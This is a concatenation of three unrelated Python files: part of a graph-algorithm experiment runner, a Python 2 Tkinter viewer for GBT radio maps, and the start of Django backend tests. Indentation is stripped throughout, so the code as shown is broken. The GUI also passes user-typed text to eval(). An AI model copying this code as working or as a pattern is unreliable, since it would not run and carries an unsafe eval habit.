thread_num_lst = ['40']
data_set_lst = my_config_dict[data_set_lst_tag]
exp_res_root_name = 'exp_results'
folder_name = 'exp-2019-10-07-hidx' + os.sep + env_tag
our_exec_name_lst = [
'pnd',
'hidx-org'
]
kt_type_dict = {
'ustgpu1': '2300',
'ustgpu2': '2300'
}
kt_type_name = kt_type_dict[hostname.strip()]
work_dir = os.sep.join(['.', exp_res_root_name, folder_name])
os.system('mkdir -p ' + work_dir)
logger = get_logger(os.sep.join([work_dir, hostname + '.log']), name=__name__)
logger.info(my_splitter + time.ctime() + my_splitter)
logger.info('res folder: {}'.format(folder_name))
logger.info('our exec folder: {}'.format(our_exec_path))
logger.info('our exec name list: {}'.format(our_exec_name_lst))
logger.info('thread# lst: {}'.format(thread_num_lst))
logger.info('data set lst: {}'.format(data_set_lst))
def one_round():
for data_set_name in data_set_lst:
for our_algorithm in our_exec_name_lst:
if data_set_name == 'webgraph_twitter' and our_algorithm == 'hidx-org':
continue
for t_num in thread_num_lst:
statistics_dir = os.sep.join(map(str, ['.', exp_res_root_name, folder_name, data_set_name, t_num]))
os.system('mkdir -p ' + os.sep.join([statistics_dir, 'log']))
statistics_file_path = statistics_dir + os.sep + our_algorithm + '-' + kt_type_name + '.log'
dstat_file_path = statistics_dir + os.sep + our_algorithm + '-' + kt_type_name + '-dstat.log'
log_file_path = os.sep.join(
[statistics_dir, 'log', '-'.join([our_algorithm, kt_type_name, 'raw.log'])])
logger.info('stat file path: {}'.format(statistics_file_path))
logger.info('log file path: {}'.format(log_file_path))
# 1st: append headers
append_header(statistics_file_path)
append_header(dstat_file_path)
append_header(log_file_path)
# 2nd: run exec cmd
algorithm_path = our_exec_path + os.sep + our_algorithm
params_lst = map(str, ['cgexec -g memory:yche-exp' if with_c_group else '', algorithm_path,
data_set_path + os.sep + data_set_name, kt_type_name,
statistics_file_path, ])
cmd = ' '.join(params_lst)
logger.info('exec-cmd: {}'.format(cmd))
time_out = 3600 * 5
my_env = os.environ.copy()
def execute_cmd(my_cmd):
logger.info('sub-process: {}'.format(my_cmd))
os.system(my_cmd)
# 3rd: spawn a new process to run the exec
dstat_cmd = 'dstat -tcdrlmgyn --fs >> ' + dstat_file_path
p = Process(target=execute_cmd, args=(dstat_cmd,))
p.start()
my_env['OMP_NUM_THREADS'] = str(t_num)
tle_flag, info, correct_info = time_out_util.run_with_timeout(cmd, timeout_sec=time_out,
env=my_env)
time_out_util.kill_term_recursive(p.pid)
modify_dstat_file(dstat_file_path)
# 4th: append outputs
write_split(statistics_file_path)
with open(statistics_file_path, 'a+') as ifs:
ifs.write(correct_info)
ifs.write('\nis_time_out:' + str(tle_flag))
ifs.write(my_splitter + time.ctime() + my_splitter)
ifs.write('\n\n\n\n')
if len(info) > 0:
with open(log_file_path, 'a+') as ofs:
ofs.write(info)
logger.info('finish: {}'.format(cmd))
one_round()
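# Hedged sketch of the per-run pattern used inside one_round() above: copy the
# environment, pin OMP_NUM_THREADS, and run a single command under a timeout.
# The command string and thread count are placeholders supplied by the caller.
def _example_single_run(cmd, t_num, timeout_sec=3600):
    my_env = os.environ.copy()
    my_env['OMP_NUM_THREADS'] = str(t_num)
    return time_out_util.run_with_timeout(cmd, timeout_sec=timeout_sec, env=my_env)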
if __name__ == '__main__':
hostname = socket.gethostname()
if hostname.startswith('ustgpu2'):
run_exp(env_tag=ustgpu2_tag, with_c_group=False)
elif hostname.startswith('ustgpu1'):
run_exp(env_tag=ustgpu1_tag, with_c_group=False)
elif hostname.startswith('lccpu12'):
run_exp(env_tag=lccpu12_tag, with_c_group=False)
elif hostname.startswith('gpu23'):
run_exp(env_tag=gpu23_tag)
elif hostname.startswith('gpu'):
run_exp(env_tag=gpu_other_tag)
else:
# run_exp(env_tag=knl_tag, data_path_tag=exec_path_tag)
run_exp(env_tag=knl_tag, data_path_tag=exec_path_non_hbw_tag)
|
GUI.py
|
import Tkinter as tk
import tkFileDialog
import Tkconstants
from matplotlib import pyplot as plt
import numpy as np
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
import gc
import plotGBTMap as gPlot
import sys
import matplotlib.animation as manimation
import Queue
import threading
import time
def find_nearest(array,value):
idx = (np.abs(array-value)).argmin()
return array[idx]
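# Hedged illustration: find_nearest() above returns the array element closest to
# the requested value, e.g. the call below yields 0.5 for this sample array.
def _example_find_nearest():
    return find_nearest(np.array([0.0, 0.5, 1.0]), 0.42)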
class GUI:
def __init__(self, master):
self.master=master
self.frame = tk.Frame(self.master)
self.data=np.array([])
self.Num=0
self.Num_Freq=0
self.fig=plt.figure(figsize=(7,6))
self.fig_Freq=plt.figure(figsize=(9, 5))
self.inFileTxt=None
self.freq_Txt=None
self.vMin_Txt=None
self.vMax_Txt=None
self.ax_Main=None
self.mark=None
self.metaDic={}
self.setUp()
#self.inFileTxt=None
# self.frame.pack()
def setUp(self):
self.master.protocol('WM_DELETE_WINDOW', self.close)
self.master.wm_title("GBT Map Plot Machine")
##Define the control pannel##
stepOne = tk.LabelFrame(self.master, text=" Control: ")
stepOne.grid(row=0, column=0, columnspan=95, sticky='WN', \
padx=5, pady=5, ipadx=5, ipady=5)
##OpenFile
inFileLbl = tk.Label(stepOne, text="Select the File:")
inFileLbl.grid(row=0, column=0, sticky='W', padx=5, pady=2)
self.inFileTxt = tk.Entry(stepOne)
self.inFileTxt.grid(row=0, column=1, columnspan=7, sticky="WE", pady=3)
self.inFileTxt.insert(0,"/home/chto/Desktop/NewProject3/VictorNewMap/fir_1hr_80-68_newpol_clean_map_I_800.npy")
inFileBtn = tk.Button(stepOne, text="Browse ...",command=self.askopenfile)
inFileBtn.grid(row=0, column=8, sticky='W', padx=5, pady=2)
self.inFileTxt.bind("<Return>", self.EnterFileEvent)
###PlotButton
plotBtn = tk.Button(stepOne, text="Plot",command=self.plotButton)
plotBtn.grid(row=3, column=0, sticky='W', padx=5, pady=2)
###Save Button##
self.outMovieTxt = tk.Entry(stepOne)
self.outMovieTxt.grid(row=3, column=1, columnspan=7, sticky="WE", pady=3)
self.outMovieTxt.insert(0,"./GBTPlotTool/Movie_Test/")
saveMovieBtn = tk.Button(stepOne, text="saveMov",command=self.plotSaveMov)
saveMovieBtn.grid(row=3, column=8, sticky='W', padx=5, pady=2)
self.outFreqTxt = tk.Entry(stepOne)
self.outFreqTxt.grid(row=3, column=9, columnspan=7, sticky="WE", pady=3)
self.outFreqTxt.insert(0,"./GBTPlotTool/Movie_Test/")
saveFreqBtn = tk.Button(stepOne, text="saveFreq",command=self.plotSaveFig)
saveFreqBtn.grid(row=3, column=16, sticky='W', padx=5, pady=2)
###Freq
freq_TxtLabel=tk.Label(stepOne, text="Freq:")
freq_TxtLabel.grid(row=4, column=0, sticky='W', padx=5, pady=2)
self.freq_Txt = tk.Entry(stepOne,width=5)
self.freq_Txt.grid(row=4, column=0, columnspan=5, sticky="W", pady=3,padx=50)
self.freq_Txt.insert(0,"0")
###Freq Button###
IncrFreqBtn = tk.Button(stepOne, text=">>",command=self.IncFreq)
IncrFreqBtn.grid(row=4, column=1, sticky='W', padx=50, pady=2)
DecFreqBtn = tk.Button(stepOne, text="<<",command=self.DecFreq)
DecFreqBtn.grid(row=4, column=1, sticky='W', padx=0, pady=2)
###Plot Pannel###
stepTwo = tk.LabelFrame(self.master, text=" Plot: ", width=600, height=500)
stepTwo.grid(row=0, column=95,columnspan=70,rowspan=10 ,sticky='NW', \
padx=5, pady=10, ipadx=5, ipady=5)
##Freq Plot Pannel###
stepThree = tk.LabelFrame(self.master, text=" Freq Plot: ", width=700, height=450)
stepThree.grid(row=0, column=0,columnspan=60,rowspan=20 ,sticky='WN', \
padx=5, pady=180, ipadx=5, ipady=0)
self.freq_Txt.bind("<Return>", self.EnterEvent)
####PLot Range##########
vMax_TxtLabel=tk.Label(stepOne, text="Vmax:")
vMax_TxtLabel.grid(row=5, column=0, sticky='W', padx=5, pady=2)
self.vMax_Txt = tk.Entry(stepOne,width=5)
self.vMax_Txt.grid(row=5, column=0, columnspan=1, sticky="W", pady=3, padx=60)
self.vMax_Txt.insert(0,"5")
vMin_TxtLabel=tk.Label(stepOne, text="Vmin:")
vMin_TxtLabel.grid(row=5, column=1, sticky='W', padx=0, pady=2)
self.vMin_Txt = tk.Entry(stepOne,width=5)
self.vMin_Txt.grid(row=5, column=1, columnspan=1, sticky="W", pady=3, padx=60)
self.vMin_Txt.insert(0,"-2")
self.vMin_Txt.bind("<Return>", self.EnterEvent)
self.vMax_Txt.bind("<Return>", self.EnterEvent)
def close(self):
self.master.quit()
self.master.destroy()
print "Thanks for using it. Have a nice day :)\n"
def DecFreq(self):
freq=self.freq_Txt.get()
self.freq_Txt.delete(0,"end")
self.freq_Txt.insert(0,repr(eval(freq)-1))
self.plotFigure()
def IncFreq(self):
freq=self.freq_Txt.get()
self.freq_Txt.delete(0,"end")
self.freq_Txt.insert(0,repr(eval(freq)+1))
self.plotFigure()
def EnterFileEvent(self,event):
self.data=np.array([])
self.plotFigure()
def EnterEvent(self,event):
self.plotFigure()
def plotButton(self):
print "open_File"
self.openFile()
self.plotFigure()
def plotFigure(self):
try:
self.figAgg_Main.get_tk_widget().delete(self.figAgg_Main._tkphoto)
self.fig.clf()
plt.close(self.fig)
except:
pass
try:
freq=eval(self.freq_Txt.get())
        except:
            print "Don't be stupid"
            return
if freq>=0 and freq<=256:
self.ax_Main=gPlot.plotKiyoMap(self.data,self.metaDic,self.fig,round(freq),eval(self.vMax_Txt.get()),eval(self.vMin_Txt.get()))
else:
print "Wong Freq"
if self.Num==0:
self.addFigure(self.fig)
self.Num=1
else:
self.figAgg_Main.draw()
def plotFreqFigure(self,xx=0,yy=0):
try:
self.figAgg_Freq.get_tk_widget().delete(self.figAgg_Main._tkphoto)
self.fig_Freq.clf()
plt.close(self.fig_Freq)
except:
pass
ax=self.fig_Freq.add_subplot(1,1,1)
self.line,=ax.plot(self.data[:,yy,xx])
ax.set_title("RA=%s,Dec=%s"%(repr(yy),repr(xx)))
ax.set_xlabel(r"Freq(channel)")
ax.set_ylabel(r"T(K)")
if self.Num_Freq==0:
self.addFigure(self.fig_Freq,2)
self.Num_Freq=1
else:
self.figAgg_Freq.draw()
def onclick(self,event2):
try:
ix, iy = gPlot.findCoordinate(event2.xdata,event2.ydata,\
self.metaDic,self.data.shape)
# print ix,iy
self.plotFreqFigure(ix,iy)
if self.mark:
try:
self.mark.remove()
except:
pass
self.mark=self.ax_Main.scatter(event2.xdata,event2.ydata,marker='x',color='black',s=60)
self.figAgg_Main.draw()
except:
print "Unexpected error:", sys.exc_info()[0]
# None
# self.line.set_ylim([np.min(self.data[:,iy,ix]),np.max(self.data[:,iy,ix])])
# self.line.set_ydata(self.data[:,iy,ix])
# self.figAgg_Freq.draw()
return
def addFigure(self,figure,param=0):
# set up a canvas with scrollbars
if param==0:
canvas = tk.Canvas(self.master,width=565, height=485)
canvas.grid(row=0, column=100, pady=25,padx=10,sticky='NW')
else:
canvas = tk.Canvas(self.master,width=700, height=400)
canvas.grid(row=0, column=0, columnspan=70, pady=200, padx =5, sticky='SW')
# plug in the figure
figAgg = FigureCanvasTkAgg(figure, canvas)
if param==0:
self.figAgg_Main=figAgg
mplCanvas = self.figAgg_Main.get_tk_widget()
mplCanvas.grid(sticky=Tkconstants.NSEW)
else:
self.figAgg_Freq=figAgg
mplCanvas = self.figAgg_Freq.get_tk_widget()
mplCanvas.grid(sticky=Tkconstants.NSEW)
canvas.create_window(0,0, window=mplCanvas,tags="Test")
canvas.config(scrollregion=canvas.bbox(Tkconstants.ALL))
if param==0:
cid = figure.canvas.mpl_connect('button_press_event', self.onclick)
#canvas.delete("all")
def openFile(self):
try:
name=self.inFileTxt.get()
self.data=np.load(name,'r')
f = open(name+".meta",'r')
meTa=f.readlines()
self.metaDic=eval(meTa[0])
f.close()
# self.Num=0
except:
print "File Not Exist \n"
print name
self.inFileTxt.delete(0,'end')
return
def askopenfile(self):
AskReturn=tkFileDialog.askopenfile()
if AskReturn!=None:
self.inFileTxt.delete(0,'end')
self.inFileTxt.insert(0,AskReturn.name)
return AskReturn
def plotSaveMov(self):
string=self.outMovieTxt.get()
if string:
AskReturn=tkFileDialog.asksaveasfile(initialdir=string,\
filetypes=[('Movie files', '*.mp4'),
('All files', '*'),
]
)
else:
AskReturn=tkFileDialog.asksaveasfile()
if AskReturn!=None:
self.outMovieTxt.delete(0,'end')
self.outMovieTxt.insert(0,AskReturn.name)
try:
self.plotMovie(self.outMovieTxt.get())
except:
                pass
return AskReturn
def plotSaveFig(self):
string=self.outFreqTxt.get()
if string:
AskReturn=tkFileDialog.asksaveasfile(initialdir=string,\
filetypes=[('figure file', '*.png'),
('All files', '*'),
]
)
else:
AskReturn=tkFileDialog.asksaveasfile()
if AskReturn!=None:
self.outFreqTxt.delete(0,'end')
self.outFreqTxt.insert(0,AskReturn.name)
try:
self.fig_Freq.savefig(self.outFreqTxt.get())
except:
                pass
return AskReturn
def plotMovie(self,name):
queue=Queue.Queue()
window = tk.Toplevel(self.master)
FFMpegWriter = manimation.writers['ffmpeg']
fig = plt.figure()
writer = FFMpegWriter(fps=3)
break_tag=[False]
def checkqueue(window):
while queue.qsize():
try:
msg = queue.get(0)
inFileLbl = tk.Label(window,\
text=" Running...\nFrequency=%s"%repr(msg))
inFileLbl.grid(row=0, column=0, sticky='W', padx=5, pady=2)
except Queue.Empty:
pass
def call():
with writer.saving(fig, name, 100):
for i in xrange(self.data.shape[0]):
if break_tag[0]:
break
queue.put(i)
ax=gPlot.plotKiyoMap(self.data,self.metaDic,fig,i,eval(self.vMax_Txt.get()),eval(self.vMin_Txt.get()))
writer.grab_frame()
plt.clf()
def on_closing():
break_tag[0]=True
window.destroy()
window.protocol("WM_DELETE_WINDOW", on_closing)
thread = threading.Thread(target=call)
thread.start()
while thread.is_alive():
checkqueue(window)
window.update()
time.sleep(0.001)
window.destroy()
plt.close(fig)
fig.clf()
return
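# Hedged launch sketch (not part of the original file): the usual way a class
# like GUI above is wired to a Tk root window.
def _example_launch():
    root = tk.Tk()
    GUI(root)
    root.mainloop()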
|
tests.py
|
# -*- coding: utf-8 -*-
# Unit and doctests for specific database backends.
from __future__ import unicode_literals
import copy
import datetime
from decimal import Decimal
import re
import threading
import unittest
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.core.management.color import no_style
from django.db import (connection, connections, DEFAULT_DB_ALIAS,
DatabaseError, IntegrityError, transaction)
from django.db.backends.signals import connection_created
from django.db.backends.sqlite3.base import DatabaseOperations
from django.db.backends.postgresql_psycopg2 import version as pg_version
from django.db.backends.utils import format_number, CursorWrapper
from django.db.models import Sum, Avg, Variance, StdDev
from django.db.models.fields import (AutoField, DateField, DateTimeField,
DecimalField, IntegerField, TimeField)
from django.db.models.sql.constants import CURSOR
from django.db.utils import ConnectionHandler
from django.test import (TestCase, TransactionTestCase, override_settings,
skipUnlessDBFeature, skipIfDBFeature)
from django.test.utils import str_prefix, IgnoreAllDeprecationWarningsMixin
from django.utils import six
from django.utils.six.moves import xrange
from . import models
class DummyBackendTest(TestCase):
def test_no_databases(self):
"""
Test that empty DATABASES setting default to the dummy backend.
"""
DATABASES = {}
conns = ConnectionHandler(DATABASES)
self.assertEqual(conns[DEFAULT_DB_ALIAS].settings_dict['ENGINE'],
'django.db.backends.dummy')
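# Hedged sketch (not part of the upstream suite): format_number is imported above
# from django.db.backends.utils; assuming a (value, max_digits, decimal_places)
# signature, this minimal check illustrates rounding a Decimal to two places.
class FormatNumberSketchTests(TestCase):
    def test_format_number_rounds(self):
        self.assertEqual(format_number(Decimal('3.14159'), 5, 2), '3.14')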
@unittest.skipUnless(connection.vendor == 'oracle', "Test only for Oracle")
class OracleTests(unittest.TestCase):
def test_quote_name(self):
# Check that '%' chars are escaped for query execution.
name = '"SOME%NAME"'
quoted_name = connection.ops.quote_name(name)
self.assertEqual(quoted_name % (), name)
def test_dbms_session(self):
# If the backend is Oracle, test that we can call a standard
# stored procedure through our cursor wrapper.
from django.db.backends.oracle.base import convert_unicode
with connection.cursor() as cursor:
cursor.callproc(convert_unicode('DBMS_SESSION.SET_IDENTIFIER'),
[convert_unicode('_django_testing!')])
def test_cursor_var(self):
# If the backend is Oracle, test that we can pass cursor variables
# as query parameters.
from django.db.backends.oracle.base import Database
with connection.cursor() as cursor:
var = cursor.var(Database.STRING)
cursor.execute("BEGIN %s := 'X'; END; ", [var])
self.assertEqual(var.getvalue(), 'X')
def test_long_string(self):
# If the backend is Oracle, test that we can save a text longer
# than 4000 chars and read it properly
with connection.cursor() as cursor:
cursor.execute('CREATE TABLE ltext ("TEXT" NCLOB)')
long_str = ''.join(six.text_type(x) for x in xrange(4000))
cursor.execute('INSERT INTO ltext VALUES (%s)', [long_str])
cursor.execute('SELECT text FROM ltext')
row = cursor.fetchone()
self.assertEqual(long_str, row[0].read())
cursor.execute('DROP TABLE ltext')
def test_client_encoding(self):
# If the backend is Oracle, test that the client encoding is set
# correctly. This was broken under Cygwin prior to r14781.
connection.ensure_connection()
self.assertEqual(connection.connection.encoding, "UTF-8")
self.assertEqual(connection.connection.nencoding, "UTF-8")
def test_order_of_nls_parameters(self):
# an 'almost right' datetime should work with configured
# NLS parameters as per #18465.
with connection.cursor() as cursor:
query = "select 1 from dual where '1936-12-29 00:00' < sysdate"
# Test that the query succeeds without errors - pre #18465 this
# wasn't the case.
cursor.execute(query)
self.assertEqual(cursor.fetchone()[0], 1)
@unittest.skipUnless(connection.vendor == 'sqlite', "Test only for SQLite")
class SQLiteTests(TestCase):
longMessage = True
def test_autoincrement(self):
"""
Check that auto_increment fields are created with the AUTOINCREMENT
keyword in order to be monotonically increasing. Refs #10164.
"""
statements = connection.creation.sql_create_model(models.Square,
style=no_style())
match = re.search('"id" ([^,]+),', statements[0][0])
self.assertIsNotNone(match)
self.assertEqual('integer NOT NULL PRIMARY KEY AUTOINCREMENT',
match.group(1), "Wrong SQL used to create an auto-increment "
"column on SQLite")
def test_aggregation(self):
"""
#19360: Raise NotImplementedError when aggregating on date/time fields.
"""
for aggregate in (Sum, Avg, Variance, StdDev):
self.assertRaises(NotImplementedError,
models.Item.objects.all().aggregate, aggregate('time'))
self.assertRaises(NotImplementedError,
models.Item.objects.all().aggregate, aggregate('date'))
self.assertRaises(NotImplementedError,
models.Item.objects.all().aggregate, aggregate('last_modified'))
def test_convert_values_to_handle_null_value(self):
convert_values = DatabaseOperations(connection).convert_values
self.assertIsNone(convert_values(None, AutoField(primary_key=True)))
self.assertIsNone(convert_values(None, DateField()))
self.assertIsNone(convert_values(None, DateTimeField()))
self.assertIsNone(convert_values(None, DecimalField()))
self.assertIsNone(convert_values(None, IntegerField()))
self.assertIsNone(convert_values(None, TimeField()))
@unittest.skipUnless(connection.vendor == 'postgresql', "Test only for PostgreSQL")
class PostgreSQLTests(TestCase):
def assert_parses(self, version_string, version):
self.assertEqual(pg_version._parse_version(version_string), version)
def test_parsing(self):
"""Test PostgreSQL version parsing from `SELECT version()` output"""
self.assert_parses("PostgreSQL 8.3 beta4", 80300)
self.assert_parses("PostgreSQL 8.3", 80300)
self.assert_parses("EnterpriseDB 8.3", 80300)
self.assert_parses("PostgreSQL 8.3.6", 80306)
self.assert_parses("PostgreSQL 8.4beta1", 80400)
self.assert_parses("PostgreSQL 8.3.1 on i386-apple-darwin9.2.2, compiled by GCC i686-apple-darwin9-gcc-4.0.1 (GCC) 4.0.1 (Apple Inc. build 5478)", 80301)
def test_version_detection(self):
"""Test PostgreSQL version detection"""
# Helper mocks
class CursorMock(object):
"Very simple mock of DB-API cursor"
def execute(self, arg):
pass
def fetchone(self):
return ["PostgreSQL 8.3"]
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
pass
class OlderConnectionMock(object):
"Mock of psycopg2 (< 2.0.12) connection"
def cursor(self):
return CursorMock()
# psycopg2 < 2.0.12 code path
conn = OlderConnectionMock()
self.assertEqual(pg_version.get_version(conn), 80300)
def test_connect_and_rollback(self):
"""
PostgreSQL shouldn't roll back SET TIME ZONE, even if the first
transaction is rolled back (#17062).
"""
databases = copy.deepcopy(settings.DATABASES)
new_connections = ConnectionHandler(databases)
new_connection = new_connections[DEFAULT_DB_ALIAS]
try:
# Ensure the database default time zone is different than
# the time zone in new_connection.settings_dict. We can
# get the default time zone by reset & show.
cursor = new_connection.cursor()
cursor.execute("RESET TIMEZONE")
cursor.execute("SHOW TIMEZONE")
db_default_tz = cursor.fetchone()[0]
new_tz = 'Europe/Paris' if db_default_tz == 'UTC' else 'UTC'
new_connection.close()
# Fetch a new connection with the new_tz as default
# time zone, run a query and rollback.
new_connection.settings_dict['TIME_ZONE'] = new_tz
new_connection.enter_transaction_management()
cursor = new_connection.cursor()
new_connection.rollback()
# Now let's see if the rollback rolled back the SET TIME ZONE.
cursor.execute("SHOW TIMEZONE")
tz = cursor.fetchone()[0]
self.assertEqual(new_tz, tz)
finally:
new_connection.close()
def test_connect_non_autocommit(self):
"""
The connection wrapper shouldn't believe that autocommit is enabled
after setting the time zone when AUTOCOMMIT is False (#21452).
"""
databases = copy.deepcopy(settings.DATABASES)
databases[DEFAULT_DB_ALIAS]['AUTOCOMMIT'] = False
new_connections = ConnectionHandler(databases)
new_connection = new_connections[DEFAULT_DB_ALIAS]
try:
# Open a database connection.
new_connection.cursor()
self.assertFalse(new_connection.get_autocommit())
finally:
new_connection.close()
def _select(self, val):
with connection.cursor() as cursor:
cursor.execute("SELECT %s", (val,))
return cursor.fetchone()[0]
def test_select_ascii_array(self):
a = ["awef"]
b = self._select(a)
self.assertEqual(a[0], b[0])
def test_select_unicode_array(self):
a = ["ᄲawef"]
b = self._select(a)
self.assertEqual(a[0], b[0])
def test_lookup_cast(self):
from django.db.backends.postgresql_psycopg2.operations import DatabaseOperations
do = DatabaseOperations(connection=None)
for lookup in ('iexact', 'contains', 'icontains', 'startswith',
'istartswith', 'endswith', 'iendswith', 'regex', 'iregex'):
self.assertIn('::text', do.lookup_cast(lookup))
@unittest.skipUnless(connection.vendor == 'mysql', "Test only for MySQL")
class MySQLTests(TestCase):
def test_autoincrement(self):
"""
Check that auto_increment fields are reset correctly by sql_flush().
Before MySQL version 5.0.13 TRUNCATE did not do auto_increment reset.
Refs #16961.
"""
statements = connection.ops.sql_flush(no_style(),
tables=['test'],
sequences=[{
'table': 'test',
'col': 'somecol',
}])
found_reset = False
for sql in statements:
found_reset = found_reset or 'ALTER TABLE' in sql
if connection.mysql_version < (5, 0, 13):
self.assertTrue(found_reset)
else:
self.assertFalse(found_reset)
class DateQuotingTest(TestCase):
def test_django_date_trunc(self):
"""
Test the custom ``django_date_trunc method``, in particular against
fields which clash with strings passed to it (e.g. 'year') - see
#12818__.
__: http://code.djangoproject.com/ticket/12818
"""
updated = datetime.datetime(2010, 2, 20)
models.SchoolClass.objects.create(year=2009, last_updated=updated)
years = models.SchoolClass.objects.dates('last_updated', 'year')
self.assertEqual(list(years), [datetime.date(2010, 1, 1)])
def test_django_date_extract(self):
"""
Test the custom ``django_date_extract method``, in particular against fields
which clash with strings passed to it (e.g. 'day') - see #12818__.
__: http://code.djangoproject.com/ticket/12818
"""
updated = datetime.datetime(2010, 2, 20)
models.SchoolClass.objects.create(year=2009, last_updated=updated)
classes = models.SchoolClass.objects.filter(last_updated__day=20)
self.assertEqual(len(classes), 1)
@override_settings(DEBUG=True)
class LastExecutedQueryTest(TestCase):
def test_last_executed_query(self):
"""
last_executed_query should not raise an exception even if no previous
query has been run.
"""
cursor = connection.cursor()
try:
connection.ops.last_executed_query(cursor, '', ())
except Exception:
self.fail("'last_executed_query' should not raise an exception.")
def test_debug_sql(self):
list(models.Reporter.objects.filter(first_name="test"))
sql = connection.queries[-1]['sql'].lower()
self.assertIn("select", sql)
self.assertIn(models.Reporter._meta.db_table, sql)
def test_query_encoding(self):
"""
Test that last_executed_query() returns an Unicode string
"""
data = models.RawData.objects.filter(raw_data=b'\x00\x46 \xFE').extra(select={'föö': 1})
sql, params = data.query.sql_with_params()
cursor = data.query.get_compiler('default').execute_sql(CURSOR)
last_sql = cursor.db.ops.last_executed_query(cursor, sql, params)
self.assertIsInstance(last_sql, six.text_type)
@unittest.skipUnless(connection.vendor == 'sqlite',
"This test is specific to SQLite.")
def test_no_interpolation_on_sqlite(self):
# Regression for #17158
# This shouldn't raise an exception
query = "SELECT strftime('%Y', 'now');"
connection.cursor().execute(query)
self.assertEqual(connection.queries[-1]['sql'],
str_prefix("QUERY = %(_)s\"SELECT strftime('%%Y', 'now');\" - PARAMS = ()"))
class ParameterHandlingTest(TestCase):
def test_bad_parameter_count(self):
"An executemany call with too many/not enough parameters will raise an exception (Refs #12612)"
cursor = connection.cursor()
query = ('INSERT INTO %s (%s, %s) VALUES (%%s, %%s)' % (
connection.introspection.table_name_converter('backends_square'),
connection.ops.quote_name('root'),
connection.ops.quote_name('square')
))
self.assertRaises(Exception, cursor.executemany, query, [(1, 2, 3)])
self.assertRaises(Exception, cursor.executemany, query, [(1,)])
# Unfortunately, the following tests would be good to run on all backends, but
# they break MySQL hard. Until #13711 is fixed, they can't be run everywhere
# (although they would be an effective test of #13711).
class LongNameTest(TestCase):
"""Long primary keys and model names can result in a sequence name
that exceeds the database limits, which will result in truncation
on certain databases (e.g., Postgres). The backend needs to use
    the correct sequence name in last_insert_id and other places, so
    check that it is. Refs #8901.
"""
@skipUnlessDBFeature('supports_long_model_names')
def test_sequence_name_length_limits_create(self):
"""Test creation of model with long name and long pk name doesn't error. Ref #8901"""
models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ.objects.create()
@skipUnlessDBFeature('supports_long_model_names')
def test_sequence_name_length_limits_m2m(self):
"""Test an m2m save of a model with a long name and a long m2m field name doesn't error as on Django >=1.2 this now uses object saves. Ref #8901"""
obj = models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ.objects.create()
rel_obj = models.Person.objects.create(first_name='Django', last_name='Reinhardt')
obj.m2m_also_quite_long_zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.add(rel_obj)
@skipUnlessDBFeature('supports_long_model_names')
def test_sequence_name_length_limits_flush(self):
"""Test that sequence resetting as part of a flush with model with long name and long pk name doesn't error. Ref #8901"""
# A full flush is expensive to the full test, so we dig into the
# internals to generate the likely offending SQL and run it manually
# Some convenience aliases
VLM = models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
VLM_m2m = VLM.m2m_also_quite_long_zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.through
tables = [
VLM._meta.db_table,
VLM_m2m._meta.db_table,
]
sequences = [
{
'column': VLM._meta.pk.column,
'table': VLM._meta.db_table
},
]
cursor = connection.cursor()
for statement in connection.ops.sql_flush(no_style(), tables, sequences):
cursor.execute(statement)
class SequenceResetTest(TestCase):
def test_generic_relation(self):
"Sequence names are correct when resetting generic relations (Ref #13941)"
# Create an object with a manually specified PK
models.Post.objects.create(id=10, name='1st post', text='hello world')
# Reset the sequences for the database
cursor = connection.cursor()
commands = connections[DEFAULT_DB_ALIAS].ops.sequence_reset_sql(no_style(), [models.Post])
for sql in commands:
cursor.execute(sql)
# If we create a new object now, it should have a PK greater
# than the PK we specified manually.
obj = models.Post.objects.create(name='New post', text='goodbye world')
self.assertTrue(obj.pk > 10)
# This test needs to run outside of a transaction, otherwise closing the
# connection would implicitly rollback and cause problems during teardown.
class ConnectionCreatedSignalTest(TransactionTestCase):
available_apps = []
# Unfortunately with sqlite3 the in-memory test database cannot be closed,
# and so it cannot be re-opened during testing.
@skipUnlessDBFeature('test_db_allows_multiple_connections')
def test_signal(self):
data = {}
def receiver(sender, connection, **kwargs):
data["connection"] = connection
connection_created.connect(receiver)
connection.close()
connection.cursor()
self.assertTrue(data["connection"].connection is connection.connection)
connection_created.disconnect(receiver)
data.clear()
connection.cursor()
self.assertTrue(data == {})
class EscapingChecks(TestCase):
"""
All tests in this test case are also run with settings.DEBUG=True in
EscapingChecksDebug test case, to also test CursorDebugWrapper.
"""
bare_select_suffix = connection.features.bare_select_suffix
def test_paramless_no_escaping(self):
cursor = connection.cursor()
cursor.execute("SELECT '%s'" + self.bare_select_suffix)
self.assertEqual(cursor.fetchall()[0][0], '%s')
def test_parameter_escaping(self):
cursor = connection.cursor()
cursor.execute("SELECT '%%', %s" + self.bare_select_suffix, ('%d',))
self.assertEqual(cursor.fetchall()[0], ('%', '%d'))
@unittest.skipUnless(connection.vendor == 'sqlite',
"This is an sqlite-specific issue")
def test_sqlite_parameter_escaping(self):
#13648: '%s' escaping support for sqlite3
cursor = connection.cursor()
cursor.execute("select strftime('%s', date('now'))")
response = cursor.fetchall()[0][0]
        # response should be a non-zero integer
self.assertTrue(int(response))
@override_settings(DEBUG=True)
class EscapingChecksDebug(EscapingChecks):
pass
class BackendTestCase(TestCase):
def create_squares_with_executemany(self, args):
self.create_squares(args, 'format', True)
def create_squares(self, args, paramstyle, multiple):
cursor = connection.cursor()
opts = models.Square._meta
tbl = connection.introspection.table_name_converter(opts.db_table)
f1 = connection.ops.quote_name(opts.get_field('root').column)
f2 = connection.ops.quote_name(opts.get_field('square').column)
if paramstyle == 'format':
query = 'INSERT INTO %s (%s, %s) VALUES (%%s, %%s)' % (tbl, f1, f2)
elif paramstyle == 'pyformat':
query = 'INSERT INTO %s (%s, %s) VALUES (%%(root)s, %%(square)s)' % (tbl, f1, f2)
else:
raise ValueError("unsupported paramstyle in test")
if multiple:
cursor.executemany(query, args)
else:
cursor.execute(query, args)
def test_cursor_executemany(self):
#4896: Test cursor.executemany
